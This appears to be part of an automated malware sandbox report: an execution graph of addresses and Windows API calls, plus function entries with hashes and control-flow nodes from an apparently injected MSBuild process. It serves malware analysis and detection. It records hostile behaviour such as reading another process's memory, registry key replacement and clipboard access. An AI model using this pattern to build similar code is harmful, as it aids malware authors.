                              execution_graph 48059 12832c8 48060 12832ec 48059->48060 48061 1283301 48060->48061 48064 1284868 48060->48064 48070 1284857 48060->48070 48065 1284895 48064->48065 48066 12848f4 48065->48066 48076 1288ff9 48065->48076 48081 12893e1 48065->48081 48086 128941a 48065->48086 48071 1284895 48070->48071 48072 12848f4 48071->48072 48073 1288ff9 RtlCreateHeap 48071->48073 48074 128941a RtlCreateHeap 48071->48074 48075 12893e1 RtlCreateHeap 48071->48075 48073->48072 48074->48072 48075->48072 48077 1289035 48076->48077 48078 12895db 48077->48078 48091 1289790 48077->48091 48097 128977f 48077->48097 48078->48078 48083 1289187 48081->48083 48082 12895db 48082->48082 48083->48082 48084 128977f RtlCreateHeap 48083->48084 48085 1289790 RtlCreateHeap 48083->48085 48084->48083 48085->48083 48088 1289187 48086->48088 48087 12895db 48087->48087 48088->48087 48089 128977f RtlCreateHeap 48088->48089 48090 1289790 RtlCreateHeap 48088->48090 48089->48088 48090->48088 48092 12897a5 48091->48092 48094 12897d3 48092->48094 48103 128a611 48092->48103 48108 128a570 48092->48108 48113 128a648 48092->48113 48094->48077 48098 12897a5 48097->48098 48099 12897d3 48098->48099 48100 128a648 RtlCreateHeap 48098->48100 48101 128a570 RtlCreateHeap 48098->48101 48102 128a611 RtlCreateHeap 48098->48102 48099->48077 48100->48099 48101->48099 48102->48099 48104 128a616 48103->48104 48105 128a707 48104->48105 48118 128afc8 48104->48118 48122 128afd8 48104->48122 48105->48094 48109 128a575 48108->48109 48110 128a707 48109->48110 48111 128afc8 RtlCreateHeap 48109->48111 48112 128afd8 RtlCreateHeap 48109->48112 48110->48094 48111->48110 48112->48110 48114 128a64d 48113->48114 48115 128a707 48114->48115 48116 128afc8 RtlCreateHeap 48114->48116 48117 128afd8 RtlCreateHeap 48114->48117 48115->48094 48116->48115 48117->48115 48120 128affc 48118->48120 48126 128a560 48120->48126 48123 128affc 48122->48123 48124 128a560 RtlCreateHeap 48123->48124 48125 128b257 48124->48125 48125->48105 48127 128e838 RtlCreateHeap 48126->48127 48129 128b257 48127->48129 48129->48105 47751 128c560 47752 128c5b0 NtWow64QueryInformationProcess64 47751->47752 47753 128c626 47752->47753 47754 5e557e8 47755 5e557ff 47754->47755 47756 5e5581d 47754->47756 47757 5e558ec 47756->47757 47761 5e55958 47756->47761 47766 5e55949 47756->47766 47758 5e55920 47762 5e5597f 47761->47762 47771 5e55a81 47762->47771 47776 5e55a90 47762->47776 47763 5e55a2f 47763->47758 47767 5e55958 47766->47767 47769 5e55a81 14 API calls 47767->47769 47770 5e55a90 14 API calls 47767->47770 47768 5e55a2f 47768->47758 47769->47768 47770->47768 47772 5e55a90 47771->47772 47781 665f4b1 47772->47781 47786 665f4c0 47772->47786 47773 5e55ad6 47773->47763 47777 5e55abd 47776->47777 47779 665f4b1 14 API calls 47777->47779 47780 665f4c0 14 API calls 47777->47780 47778 5e55ad6 47778->47763 47779->47778 47780->47778 47782 665f4c0 47781->47782 47791 665f559 47782->47791 47796 665f568 47782->47796 47783 665f527 47783->47773 47787 665f4d4 47786->47787 47789 665f559 14 API calls 47787->47789 47790 665f568 14 API calls 47787->47790 47788 665f527 47788->47773 47789->47788 47790->47788 47793 665f568 47791->47793 47792 665f594 47792->47783 47793->47792 47801 665fb91 47793->47801 47805 665fba0 47793->47805 47797 665f594 47796->47797 47798 665f57f 47796->47798 47797->47783 47798->47797 47799 665fb91 14 API calls 47798->47799 47800 665fba0 14 API calls 47798->47800 47799->47797 47800->47797 47802 665fb9a 47801->47802 47804 665fbc3 47802->47804 47809 665d088 47802->47809 47804->47792 47806 665fbb8 47805->47806 47807 665d088 14 API calls 47806->47807 47808 665fbc3 47806->47808 47807->47808 47808->47792 47810 665d0e6 47809->47810 47811 665d094 47809->47811 47810->47804 47814 665d0f8 47811->47814 47818 665d108 47811->47818 47815 665d108 47814->47815 47817 665d1df 47815->47817 47822 665af78 47815->47822 47817->47810 47819 665d11b 47818->47819 47820 665af78 14 API calls 47819->47820 47821 665d1df 47819->47821 47820->47821 47821->47810 47826 665af92 47822->47826 47823 665b189 47824 665b12d 47823->47824 47915 665b97f 47823->47915 47919 665b8cc 47823->47919 47923 665b950 47823->47923 47927 665b8e1 47823->47927 47931 665b5b1 47823->47931 47935 665b885 47823->47935 47939 665b959 47823->47939 47943 665b8ae 47823->47943 47947 665b94e 47823->47947 47824->47817 47825 665b328 47825->47817 47826->47823 47826->47824 47827 665b155 RegReplaceKeyA 47826->47827 47842 665be01 47826->47842 47855 665be10 47826->47855 47868 665c218 47826->47868 47892 665c228 47826->47892 47827->47824 47843 665be10 47842->47843 47844 665bed5 47843->47844 47845 665bf08 47843->47845 47853 665be67 47843->47853 47847 665af78 14 API calls 47844->47847 47846 665bf16 47845->47846 47849 665bf3c 47845->47849 47848 665af78 14 API calls 47846->47848 47847->47853 47848->47853 47850 665bf78 47849->47850 47851 665bfda 47849->47851 47849->47853 47852 665be10 14 API calls 47850->47852 47851->47853 47854 665af78 14 API calls 47851->47854 47852->47853 47853->47826 47854->47853 47856 665be24 47855->47856 47857 665bed5 47856->47857 47858 665bf08 47856->47858 47866 665be67 47856->47866 47860 665af78 14 API calls 47857->47860 47859 665bf16 47858->47859 47862 665bf3c 47858->47862 47861 665af78 14 API calls 47859->47861 47860->47866 47861->47866 47863 665bf78 47862->47863 47864 665bfda 47862->47864 47862->47866 47865 665be10 14 API calls 47863->47865 47864->47866 47867 665af78 14 API calls 47864->47867 47865->47866 47866->47826 47867->47866 47869 665c228 47868->47869 47870 665be10 12 API calls 47869->47870 47871 665c249 47870->47871 47872 665af78 12 API calls 47871->47872 47873 665c2a5 47871->47873 47872->47873 47875 665c47c 47873->47875 47951 665cc71 47873->47951 47958 665cc80 47873->47958 47965 665cea8 47873->47965 47974 665ceb8 47873->47974 47983 665cd40 47873->47983 47874 665c576 47886 665d088 12 API calls 47874->47886 47990 665d078 47874->47990 47875->47874 47878 665c781 47875->47878 47876 665c681 RegQueryValueA 47883 665c6c5 47876->47883 47877 665c7c4 47877->47826 47878->47877 47881 665c8f0 LdrInitializeThunk 47878->47881 47880 665c63c 47880->47876 47882 665af78 12 API calls 47880->47882 47884 665c925 47881->47884 47882->47876 47883->47826 47884->47826 47886->47880 47893 665be10 12 API calls 47892->47893 47894 665c249 47893->47894 47895 665af78 12 API calls 47894->47895 47896 665c2a5 47894->47896 47895->47896 47898 665c47c 47896->47898 47910 665cc71 12 API calls 47896->47910 47911 665cc80 12 API calls 47896->47911 47912 665cd40 12 API calls 47896->47912 47913 665cea8 12 API calls 47896->47913 47914 665ceb8 12 API calls 47896->47914 47897 665c576 47908 665d078 12 API calls 47897->47908 47909 665d088 12 API calls 47897->47909 47898->47897 47901 665c781 47898->47901 47899 665c681 RegQueryValueA 47906 665c6c5 47899->47906 47900 665c7c4 47900->47826 47901->47900 47904 665c8f0 LdrInitializeThunk 47901->47904 47903 665c63c 47903->47899 47905 665af78 12 API calls 47903->47905 47907 665c925 47904->47907 47905->47899 47906->47826 47907->47826 47908->47903 47909->47903 47910->47898 47911->47898 47912->47898 47913->47898 47914->47898 47916 665b6ca 47915->47916 47917 665b6f0 LdrInitializeThunk 47916->47917 47918 665b99b 47916->47918 47917->47916 47918->47825 47922 665b6ca 47919->47922 47920 665b6f0 LdrInitializeThunk 47920->47922 47921 665b99b 47921->47825 47922->47920 47922->47921 47924 665b6ca 47923->47924 47925 665b97b 47924->47925 47926 665b6f0 LdrInitializeThunk 47924->47926 47925->47825 47926->47924 47930 665b6ca 47927->47930 47928 665b99b 47928->47825 47929 665b6f0 LdrInitializeThunk 47929->47930 47930->47928 47930->47929 47934 665b5ea 47931->47934 47932 665b6f0 LdrInitializeThunk 47932->47934 47933 665b99b 47933->47825 47934->47932 47934->47933 47936 665b6ca 47935->47936 47937 665b99b 47936->47937 47938 665b6f0 LdrInitializeThunk 47936->47938 47937->47825 47938->47936 47942 665b6ca 47939->47942 47940 665b97b 47940->47825 47941 665b6f0 LdrInitializeThunk 47941->47942 47942->47940 47942->47941 47944 665b6ca 47943->47944 47945 665b99b 47944->47945 47946 665b6f0 LdrInitializeThunk 47944->47946 47945->47825 47946->47944 47950 665b6ca 47947->47950 47948 665b97b 47948->47825 47949 665b6f0 LdrInitializeThunk 47949->47950 47950->47948 47950->47949 47953 665cc80 47951->47953 47952 665cc9e 47952->47875 47953->47952 47954 665ce65 47953->47954 47957 665af78 14 API calls 47953->47957 47955 665ce7d 47954->47955 47956 665cc80 14 API calls 47954->47956 47955->47875 47956->47955 47957->47953 47959 665cc9e 47958->47959 47964 665cc97 47958->47964 47959->47875 47960 665ce65 47961 665ce7d 47960->47961 47962 665cc80 14 API calls 47960->47962 47961->47875 47962->47961 47963 665af78 14 API calls 47963->47964 47964->47959 47964->47960 47964->47963 47966 665ceb2 47965->47966 47968 665ce6f 47966->47968 47971 665ceed 47966->47971 47967 665ce7d 47967->47875 47968->47967 47969 665cc80 14 API calls 47968->47969 47969->47967 47970 665ceb8 14 API calls 47973 665cfed 47970->47973 47971->47970 47972 665cf9c 47971->47972 47972->47875 47973->47875 47975 665cec3 47974->47975 47977 665ceed 47975->47977 47979 665ce6f 47975->47979 47976 665ce7d 47976->47875 47978 665ceb8 14 API calls 47977->47978 47981 665cf9c 47977->47981 47982 665cfed 47978->47982 47979->47976 47980 665cc80 14 API calls 47979->47980 47980->47976 47981->47875 47982->47875 47985 665cd68 47983->47985 47984 665ce98 47984->47875 47985->47984 47986 665ce65 47985->47986 47989 665af78 14 API calls 47985->47989 47987 665ce7d 47986->47987 47988 665cc80 14 API calls 47986->47988 47987->47875 47988->47987 47989->47985 47992 665d088 47990->47992 47991 665d0e6 47991->47880 47992->47991 47993 665d0f8 14 API calls 47992->47993 47994 665d108 14 API calls 47992->47994 47993->47991 47994->47991 48130 5e56b88 48140 5e56c28 48130->48140 48145 5e56c18 48130->48145 48131 5e56ba6 48150 5e59b00 48131->48150 48156 5e59af0 48131->48156 48132 5e56bec 48161 5de05f1 48132->48161 48170 5de0600 48132->48170 48133 5e56c0a 48141 5e56c46 48140->48141 48143 665af67 15 API calls 48141->48143 48144 665af78 14 API calls 48141->48144 48142 5e56c51 48142->48131 48143->48142 48144->48142 48146 5e56c28 48145->48146 48148 665af67 15 API calls 48146->48148 48149 665af78 14 API calls 48146->48149 48147 5e56c51 48147->48131 48148->48147 48149->48147 48151 5e59b16 48150->48151 48152 5e59b10 48150->48152 48153 5e59b29 48151->48153 48178 5e59b60 48151->48178 48184 5e5a10c 48151->48184 48152->48132 48153->48132 48157 5e59acf 48156->48157 48157->48132 48157->48156 48158 5e59b10 48157->48158 48159 5e59b60 15 API calls 48157->48159 48160 5e5a10c 15 API calls 48157->48160 48158->48132 48159->48158 48160->48158 48162 5de058b 48161->48162 48163 5de05fa 48161->48163 48162->48133 48168 5e59b00 15 API calls 48163->48168 48169 5e59af0 15 API calls 48163->48169 48164 5de0672 48166 5e59b00 15 API calls 48164->48166 48167 5e59af0 15 API calls 48164->48167 48165 5de06a1 48165->48133 48166->48165 48167->48165 48168->48164 48169->48164 48171 5de0614 48170->48171 48174 5e59b00 15 API calls 48171->48174 48175 5e59af0 15 API calls 48171->48175 48172 5de0672 48176 5e59b00 15 API calls 48172->48176 48177 5e59af0 15 API calls 48172->48177 48173 5de06a1 48173->48133 48174->48172 48175->48172 48176->48173 48177->48173 48179 5e59b63 48178->48179 48180 5e59b3f 48178->48180 48182 5e5a10c 15 API calls 48179->48182 48183 5e59b7e 48179->48183 48190 5e5a374 48179->48190 48180->48153 48182->48183 48183->48153 48185 5e5a116 48184->48185 48186 5e5a124 48185->48186 48301 5dec87b 48185->48301 48306 5dec9f3 48185->48306 48312 5dec888 48185->48312 48186->48153 48191 5e5a37e 48190->48191 48197 5e5abd0 48191->48197 48202 5e5add8 48191->48202 48206 5e5ade8 48191->48206 48210 5e5ab63 48191->48210 48192 5e5a38a 48192->48183 48198 5e5abeb 48197->48198 48215 5e5fa68 48198->48215 48220 5e5fa78 48198->48220 48199 5e5ac91 48199->48192 48203 5e5adf8 48202->48203 48235 5e5ae01 48202->48235 48240 5e5ae10 48202->48240 48203->48192 48208 5e5ae01 15 API calls 48206->48208 48209 5e5ae10 15 API calls 48206->48209 48207 5e5adf8 48207->48192 48208->48207 48209->48207 48211 5e5abeb 48210->48211 48213 5e5fa68 15 API calls 48211->48213 48214 5e5fa78 15 API calls 48211->48214 48212 5e5ac91 48212->48192 48213->48212 48214->48212 48216 5e5fb2e 48215->48216 48217 5e5fa9c 48215->48217 48216->48199 48217->48216 48225 5e5fb50 48217->48225 48230 5e5fb43 48217->48230 48221 5e5fb2e 48220->48221 48222 5e5fa9c 48220->48222 48221->48199 48222->48221 48223 5e5fb50 15 API calls 48222->48223 48224 5e5fb43 15 API calls 48222->48224 48223->48222 48224->48222 48226 5e5fb75 48225->48226 48228 5e5ade8 15 API calls 48226->48228 48229 5e5add8 15 API calls 48226->48229 48227 5e5fbdb 48227->48217 48228->48227 48229->48227 48231 5e5fb75 48230->48231 48233 5e5ade8 15 API calls 48231->48233 48234 5e5add8 15 API calls 48231->48234 48232 5e5fbdb 48232->48217 48233->48232 48234->48232 48236 5e5ae10 48235->48236 48244 5e5ae40 48236->48244 48253 5e5ae50 48236->48253 48237 5e5ae24 48237->48203 48242 5e5ae40 15 API calls 48240->48242 48243 5e5ae50 15 API calls 48240->48243 48241 5e5ae24 48241->48203 48242->48241 48243->48241 48245 5e5ae50 48244->48245 48246 5e5ae7c 48245->48246 48251 5e5ae40 15 API calls 48245->48251 48252 5e5ae50 15 API calls 48245->48252 48248 5e5ae8e 48246->48248 48262 5e5e7c8 48246->48262 48267 5e5e7b8 48246->48267 48247 5e5af67 48247->48237 48248->48237 48251->48246 48252->48246 48254 5e5ae5e 48253->48254 48255 5e5ae7c 48254->48255 48260 5e5ae40 15 API calls 48254->48260 48261 5e5ae50 15 API calls 48254->48261 48257 5e5ae8e 48255->48257 48258 5e5e7c8 15 API calls 48255->48258 48259 5e5e7b8 15 API calls 48255->48259 48256 5e5af67 48256->48237 48257->48237 48258->48256 48259->48256 48260->48255 48261->48255 48263 5e5e7da 48262->48263 48264 5e5e7aa 48263->48264 48272 5e5f0e9 48263->48272 48278 5e5f0f8 48263->48278 48264->48247 48268 5e5e7c8 48267->48268 48269 5e5e7aa 48268->48269 48270 5e5f0e9 15 API calls 48268->48270 48271 5e5f0f8 15 API calls 48268->48271 48269->48247 48270->48269 48271->48269 48274 5e5f0f8 48272->48274 48273 5e5f2b2 48273->48264 48274->48273 48276 5e5f1e5 48274->48276 48284 5e56dd0 48274->48284 48276->48273 48277 5e56dd0 15 API calls 48276->48277 48277->48276 48279 5e5f11f 48278->48279 48280 5e5f2b2 48279->48280 48281 5e56dd0 15 API calls 48279->48281 48282 5e5f1e5 48279->48282 48280->48264 48281->48279 48282->48280 48283 5e56dd0 15 API calls 48282->48283 48283->48282 48286 5e56deb 48284->48286 48285 5e56e32 48285->48274 48286->48285 48290 5e57508 48286->48290 48296 5e574f8 48286->48296 48287 5e57267 48287->48274 48291 5e57514 48290->48291 48292 5e5751a 48290->48292 48291->48287 48293 5e57520 48292->48293 48294 5e57891 15 API calls 48292->48294 48295 5e578a0 15 API calls 48292->48295 48293->48287 48294->48292 48295->48292 48297 5e57508 48296->48297 48298 5e57514 48297->48298 48299 5e57891 15 API calls 48297->48299 48300 5e578a0 15 API calls 48297->48300 48298->48287 48299->48297 48300->48297 48302 5dec89e 48301->48302 48303 5dec8dd 48301->48303 48302->48186 48303->48302 48304 5e5ade8 15 API calls 48303->48304 48305 5e5add8 15 API calls 48303->48305 48304->48302 48305->48302 48307 5dec9b4 48306->48307 48308 5dec9fe 48306->48308 48307->48308 48310 5e5ade8 15 API calls 48307->48310 48311 5e5add8 15 API calls 48307->48311 48308->48186 48309 5dec9d0 48309->48186 48310->48309 48311->48309 48313 5dec8dd 48312->48313 48314 5dec89e 48312->48314 48313->48314 48315 5e5ade8 15 API calls 48313->48315 48316 5e5add8 15 API calls 48313->48316 48314->48186 48315->48314 48316->48314 48321 5de2ff0 48322 5de2fcf LookupPrivilegeDisplayNameW 48321->48322 48324 5de2ff3 48321->48324 47995 665aef0 47996 665af01 47995->47996 47999 665af78 14 API calls 47996->47999 48000 665af67 47996->48000 47997 665af61 47999->47997 48002 665af78 48000->48002 48001 665b12d 48001->47997 48002->48001 48003 665b155 RegReplaceKeyA 48002->48003 48005 665b189 48002->48005 48016 665be01 14 API calls 48002->48016 48017 665be10 14 API calls 48002->48017 48018 665c228 14 API calls 48002->48018 48019 665c218 14 API calls 48002->48019 48003->48001 48005->48001 48007 665b885 LdrInitializeThunk 48005->48007 48008 665b5b1 LdrInitializeThunk 48005->48008 48009 665b8e1 LdrInitializeThunk 48005->48009 48010 665b950 LdrInitializeThunk 48005->48010 48011 665b8cc LdrInitializeThunk 48005->48011 48012 665b97f LdrInitializeThunk 48005->48012 48013 665b8ae LdrInitializeThunk 48005->48013 48014 665b94e LdrInitializeThunk 48005->48014 48015 665b959 LdrInitializeThunk 48005->48015 48006 665b328 48006->47997 48007->48006 48008->48006 48009->48006 48010->48006 48011->48006 48012->48006 48013->48006 48014->48006 48015->48006 48016->48002 48017->48002 48018->48002 48019->48002 48325 6660611 FreeLibrary 48326 128c750 48327 128c79d NtWow64ReadVirtualMemory64 48326->48327 48328 128c825 48327->48328 48329 128bfd0 48330 128c01d DuplicateHandle 48329->48330 48331 128c0b2 48330->48331 48332 5e1df98 48333 5e1dfa0 OleInitialize 48332->48333 48334 5e1e027 48333->48334 48020 665f0b8 48021 665f0d7 48020->48021 48022 665f1d6 48020->48022 48023 665f0e1 48021->48023 48024 665f16a 48021->48024 48028 665f117 48022->48028 48032 665f2e0 48022->48032 48039 665f2f0 48022->48039 48026 665af78 14 API calls 48023->48026 48023->48028 48025 665af78 14 API calls 48024->48025 48025->48028 48026->48028 48027 665f2c6 48028->48027 48029 665af78 14 API calls 48028->48029 48029->48027 48033 665f2e8 48032->48033 48033->48033 48034 665af78 14 API calls 48033->48034 48035 665f302 48034->48035 48045 665f41a 48035->48045 48050 665f420 48035->48050 48036 665f363 48036->48028 48040 665af78 14 API calls 48039->48040 48041 665f302 48040->48041 48043 665f420 14 API calls 48041->48043 48044 665f41a 14 API calls 48041->48044 48042 665f363 48042->48028 48043->48042 48044->48042 48046 665f420 48045->48046 48048 665f4b1 14 API calls 48046->48048 48049 665f4c0 14 API calls 48046->48049 48047 665f474 48047->48036 48048->48047 48049->48047 48051 665f445 48050->48051 48053 665f4b1 14 API calls 48051->48053 48054 665f4c0 14 API calls 48051->48054 48052 665f474 48052->48036 48053->48052 48054->48052 48055 5de4ac0 48056 5de4ac1 48055->48056 48057 5de4b0e LookupPrivilegeDisplayNameW 48056->48057 48058 5de4af1 48056->48058 48335 5e1e11e 48336 5e1e126 OleGetClipboard 48335->48336 48338 5e1e095 48335->48338 48341 5e1e1f4 48336->48341 48340 5e1e0bb 48338->48340 48342 5e1d5a8 48338->48342 48343 5e1e128 OleGetClipboard 48342->48343 48345 5e1e1f4 48343->48345

                              Executed Functions

                              Function 05E57988 Relevance: 5.0, Strings: 3, Instructions: 1233COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3858333931.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_5e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: +($;0$K0
                              • API String ID: 0-1654014282
                              • Opcode ID: 66d52691e0f9e74cec6626573387853670e0804a2f3cfb85824f99056ae1c54a
                              • Instruction ID: 62f2526fd1191697281013fc7825cb973635e2356e47407139c832aa21c16447
                              • Opcode Fuzzy Hash: 66d52691e0f9e74cec6626573387853670e0804a2f3cfb85824f99056ae1c54a
                              • Instruction Fuzzy Hash: CAB20574B04214CFEB54DF69C894A69B7F2BF88324F2584A9D98ADB361DB30EC41CB51
                              Function 0665C228 Relevance: 3.7, APIs: 2, Instructions: 700registrylibraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 353 665c228-665c270 call 665be10 358 665c276-665c27a 353->358 359 665c272-665c274 353->359 360 665c280-665c2a3 358->360 359->360 365 665c2a5-665c2aa 360->365 366 665c2af-665c2bb 360->366 367 665c38b-665c391 365->367 371 665c2bd-665c2e9 call 665af78 366->371 372 665c2ee-665c2fa 366->372 369 665c397-665c3b7 367->369 370 665c393 367->370 383 665c3c3-665c3d8 369->383 384 665c3b9-665c3be 369->384 370->369 371->367 376 665c306-665c31a 372->376 377 665c2fc-665c301 372->377 388 665c386 376->388 389 665c31c-665c33e 376->389 377->367 397 665c3de-665c3ee 383->397 398 665c45b 383->398 387 665c460-665c46e 384->387 393 665c486-665c492 387->393 394 665c470-665c474 387->394 388->367 410 665c364-665c37d 389->410 411 665c340-665c362 389->411 402 665c576-665c5aa 393->402 403 665c498-665c4b4 393->403 534 665c476 call 665cc71 394->534 535 665c476 call 665cc80 394->535 536 665c476 call 665cd40 394->536 537 665c476 call 665cea8 394->537 538 665c476 call 665ceb8 394->538 406 665c3f0-665c400 397->406 407 665c402-665c407 397->407 398->387 399 665c47c-665c47e 399->393 426 665c5c2-665c5c4 402->426 427 665c5ac-665c5c0 402->427 418 665c562-665c570 403->418 406->407 413 665c409-665c419 406->413 407->387 410->388 428 665c37f-665c384 410->428 411->388 411->410 424 665c422-665c432 413->424 425 665c41b-665c420 413->425 418->402 420 665c4b9-665c4c2 418->420 429 665c781-665c7a8 420->429 430 665c4c8-665c4db 420->430 441 665c434-665c439 424->441 442 665c43b-665c44b 424->442 425->387 433 665c5f4-665c634 426->433 434 665c5c6-665c5d8 426->434 427->426 428->367 443 665c83c-665c870 429->443 444 665c7ae-665c7b0 429->444 430->429 431 665c4e1-665c4f3 430->431 446 665c4f5-665c501 431->446 447 665c55f 431->447 532 665c636 call 665d078 433->532 533 665c636 call 665d088 433->533 434->433 445 665c5da-665c5e2 434->445 441->387 456 665c454-665c459 442->456 457 665c44d-665c452 442->457 483 665c872-665c89b 443->483 484 665c89d-665c8a2 443->484 444->443 448 665c7b6-665c7b8 444->448 455 665c5ea-665c5ec 445->455 446->429 451 665c507-665c55c 446->451 447->418 448->443 454 665c7be-665c7c2 448->454 451->447 454->443 458 665c7c4-665c7c8 454->458 455->433 456->387 457->387 462 665c7da-665c81c call 6656218 458->462 463 665c7ca-665c7d8 458->463 461 665c63c-665c650 475 665c697-665c6e4 RegQueryValueA 461->475 476 665c652-665c669 461->476 470 665c824-665c839 462->470 463->470 497 665c6e6-665c6ff 475->497 498 665c738-665c74f 475->498 491 665c677-665c68f call 665af78 476->491 492 665c66b-665c675 476->492 483->484 486 665c8a4 484->486 487 665c8a9-665c920 LdrInitializeThunk 484->487 486->487 494 665ca04-665ca0d 487->494 491->475 492->491 500 665c925-665c92e 494->500 501 665ca13-665ca2f 494->501 512 665c701 497->512 513 665c709-665c735 497->513 509 665c775-665c77e 498->509 510 665c751-665c75a 498->510 503 665c935-665c959 500->503 504 665c930 500->504 514 665ca31-665ca72 501->514 515 665ca73-665ca7a 501->515 516 665c9a3-665ca01 503->516 517 665c95b-665c9a2 503->517 504->503 518 665c763-665c76c 510->518 512->513 513->498 514->515 516->494 517->516 518->509 532->461 533->461 534->399 535->399 536->399 537->399 538->399
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861565837.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6650000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeQueryThunkValue
                              • String ID:
                              • API String ID: 1340289250-0
                              • Opcode ID: 7675288ffdfff43a815fad904b1f6d6aa21deacad173f2646e3c78e5563fd852
                              • Instruction ID: 374c3202cf63957032f304bff3d983fbbd24a7dc85cef6116f526a62a04aace8
                              • Opcode Fuzzy Hash: 7675288ffdfff43a815fad904b1f6d6aa21deacad173f2646e3c78e5563fd852
                              • Instruction Fuzzy Hash: A8520574A006098FDB54DF69C584AAEBBF2FF89300F1585A9E806DB365DB34EC41CB90
                              Function 0665AF78 Relevance: 2.0, APIs: 1, Instructions: 491registryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1658 665af78-665af8a 1784 665af8c call 665bc45 1658->1784 1785 665af8c call 665ba28 1658->1785 1786 665af8c call 665ba18 1658->1786 1659 665af92-665afac 1661 665afae-665afb7 1659->1661 1662 665afba-665afcd 1659->1662 1661->1662 1663 665afd3-665afd6 1662->1663 1664 665b23d-665b241 1662->1664 1668 665afe5-665aff1 1663->1668 1669 665afd8-665afdd 1663->1669 1665 665b256-665b260 1664->1665 1666 665b243-665b253 1664->1666 1666->1665 1670 665aff7-665b009 1668->1670 1671 665b27b-665b2c0 1668->1671 1669->1668 1677 665b175-665b183 1670->1677 1678 665b00f-665b013 1670->1678 1675 665b2c7-665b320 1671->1675 1676 665b2c2 1671->1676 1773 665b322 call 665b885 1675->1773 1774 665b322 call 665b5b1 1675->1774 1775 665b322 call 665b8e1 1675->1775 1776 665b322 call 665b950 1675->1776 1777 665b322 call 665b8cc 1675->1777 1778 665b322 call 665b97f 1675->1778 1779 665b322 call 665b8ae 1675->1779 1780 665b322 call 665b94e 1675->1780 1781 665b322 call 665b959 1675->1781 1676->1675 1684 665b189-665b197 1677->1684 1685 665b208-665b20a 1677->1685 1782 665b015 call 665be01 1678->1782 1783 665b015 call 665be10 1678->1783 1679 665b328-665b342 1682 665b344-665b346 1679->1682 1683 665b34b-665b42c 1679->1683 1680 665b01b-665b062 1707 665b064-665b070 call 665acb8 1680->1707 1708 665b072 1680->1708 1686 665b5a0-665b5a7 1682->1686 1742 665b4c2-665b4cb 1683->1742 1688 665b1a6-665b1b2 1684->1688 1689 665b199-665b19e 1684->1689 1690 665b20c-665b212 1685->1690 1691 665b218-665b224 1685->1691 1688->1671 1695 665b1b8-665b1e7 1688->1695 1689->1688 1693 665b214 1690->1693 1694 665b216 1690->1694 1699 665b226-665b237 1691->1699 1693->1691 1694->1691 1710 665b1e9-665b1f6 1695->1710 1711 665b1f8-665b206 1695->1711 1699->1663 1699->1664 1712 665b074-665b084 1707->1712 1708->1712 1710->1711 1711->1664 1719 665b086-665b09d 1712->1719 1720 665b09f-665b0a1 1712->1720 1719->1720 1721 665b0a3-665b0b1 1720->1721 1722 665b0ea-665b0ec 1720->1722 1721->1722 1732 665b0b3-665b0c5 1721->1732 1724 665b0ee-665b0f8 1722->1724 1725 665b0fa-665b10a 1722->1725 1724->1725 1733 665b143-665b14f 1724->1733 1734 665b135-665b138 1725->1734 1735 665b10c-665b11a 1725->1735 1739 665b0c7-665b0c9 1732->1739 1740 665b0cb-665b0cf 1732->1740 1733->1699 1745 665b155-665b170 RegReplaceKeyA 1733->1745 1771 665b13b call 665c228 1734->1771 1772 665b13b call 665c218 1734->1772 1748 665b12d-665b130 1735->1748 1749 665b11c-665b12b 1735->1749 1738 665b141 1738->1733 1744 665b0d5-665b0e4 1739->1744 1740->1744 1746 665b431-665b43a 1742->1746 1747 665b4d1-665b4fb 1742->1747 1744->1722 1756 665b261-665b274 1744->1756 1745->1664 1750 665b441-665b4bf 1746->1750 1751 665b43c 1746->1751 1757 665b591-665b59a 1747->1757 1748->1664 1749->1733 1750->1742 1751->1750 1756->1671 1757->1686 1759 665b500-665b509 1757->1759 1761 665b510-665b58e 1759->1761 1762 665b50b 1759->1762 1761->1757 1762->1761 1771->1738 1772->1738 1773->1679 1774->1679 1775->1679 1776->1679 1777->1679 1778->1679 1779->1679 1780->1679 1781->1679 1782->1680 1783->1680 1784->1659 1785->1659 1786->1659
                              APIs
                              • RegReplaceKeyA.ADVAPI32(00000000), ref: 0665B167
                              Memory Dump Source
                              • Source File: 0000000B.00000002.3861565837.0000000006650000.00000040.00000800.00020000.00000000.sdmp, Offset: 06650000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_6650000_MSBuild.jbxd
                              Similarity
                              • API ID: Replace
                              • String ID:
                              • API String ID: 3273661913-0
                              • Opcode ID: cf1e3ee75ce196988c5d9ef77b37665c19f7455fe3e15951c61de2601ca00c8c
                              • Instruction ID: 16093dc52a727d44409a6931f9eac1fa908c6342dee4e4112cbd2be54f683aea
                              • Opcode Fuzzy Hash: cf1e3ee75ce196988c5d9ef77b37665c19f7455fe3e15951c61de2601ca00c8c
                              • Instruction Fuzzy Hash: 1F12F674E002188FDB54CFA9C894AAEBBF2FF89310F158169D909A7355DB309D42CFA0
                              Function 0665B5B1 Relevance: 1.8, APIs: 1, Instructions: 276libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
